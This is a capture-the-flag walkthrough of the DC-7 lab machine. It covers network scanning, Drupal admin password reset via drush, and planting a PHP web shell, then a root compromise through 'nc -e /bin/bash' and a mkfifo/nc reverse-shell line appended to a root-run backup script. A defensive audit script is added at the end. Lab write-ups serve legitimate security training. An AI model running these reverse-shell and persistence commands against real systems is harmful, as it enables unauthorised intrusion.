Dc-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
Run ifconfig to find the local host's IP address:
ifconfig
Sweep the internal network to detect live hosts:
nmap 192.168.61.0/24
Use nmap to scan the DC-5 target machine for open ports:
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

Ports 22 and 80 are open.

There is a hint here: DC7USER
Search for it on Baidu.
The search turns up a file that can be downloaded.


This also indicates that it is important.
Download it to the local Kali machine:
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php

Use SSH to connect to the target. Logging in as dc7user succeeds.

ls
The listing shows backups and mbox.
Under backups: website.sql.gpg and website.tar.gz.gpg
Both files end in .gpg. The gpg command is used to encrypt files, so the contents of the encrypted files are unreadable.
mbox is a file.
The script that performs the backup is found in the /opt/scripts directory.

Enter the /opt/scripts directory:
cd /opt/scripts
View the file:
cat backups.sh

The script uses two commands: gpg and drush.
gpg is used for encryption. drush is a command used with the Drupal framework for configuration tasks, and it can change a user's name and password.
Go to the /var/www/html directory. Because the website will have an admin user, use drush to change the admin user's password to 123456. The change succeeds.
cd /var/www/html/
drush user-password admin --password="123456"
The admin password has been changed to 123456.
Use dirb to scan for pages:
dirb http://192.168.61.136

Under Content -> Add content -> Basic page, the plan was to add PHP code for a reverse shell, but PHP turned out not to be supported there.
A Baidu search shows that PHP has to be installed as a separate module.



PHP module download address:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz


Tick the module, then click Install at the bottom.

After that it is ready.
Back on the earlier page, PHP can now be used.


AntSword connects successfully.

Then listen on Kali:
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444

python -c 'import pty;pty.spawn("/bin/bash")'
The connection succeeds.

find / -name backups.sh 2>/dev/null
Then:
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777

Root privileges obtained.
cd /root
ls
cat theflag.txt
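
The escalation above works because a script that runs with root privileges could be modified from the web server's shell. As an added example (not part of the original post), here is a POSIX shell check a defender can run to find scripts and directories that accounts other than the owner can write to. The function names are illustrative, and /opt/scripts in the usage comment is the path from the walkthrough.

```shell
#!/bin/sh
# Added example: audit a directory of admin scripts for write access by
# accounts other than the owner. Function names are illustrative.

# Print every file or directory under $1 that has the group-write or
# other-write permission bit set. A writable directory matters too:
# whoever can write to it can replace the script inside it.
audit_writable() {
    dir=$1
    if [ ! -d "$dir" ]; then
        echo "not a directory: $dir" >&2
        return 2
    fi
    find "$dir" \( -type f -o -type d \) \
        \( -perm -020 -o -perm -002 \) -print
}

# Number of findings, for use in a monitoring check or CI gate.
count_findings() {
    audit_writable "$1" | wc -l | tr -d ' '
}

# Show owner, group and mode for each finding so it can be triaged.
report_findings() {
    audit_writable "$1" | while IFS= read -r path; do
        ls -ld "$path"
    done
}

# Stand-alone use: sh audit.sh /opt/scripts
if [ "$#" -gt 0 ]; then
    report_findings "$1"
fi
```

Any path it reports for a script that root executes should be changed to root ownership with mode 755 or stricter, or the job should stop running as root.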
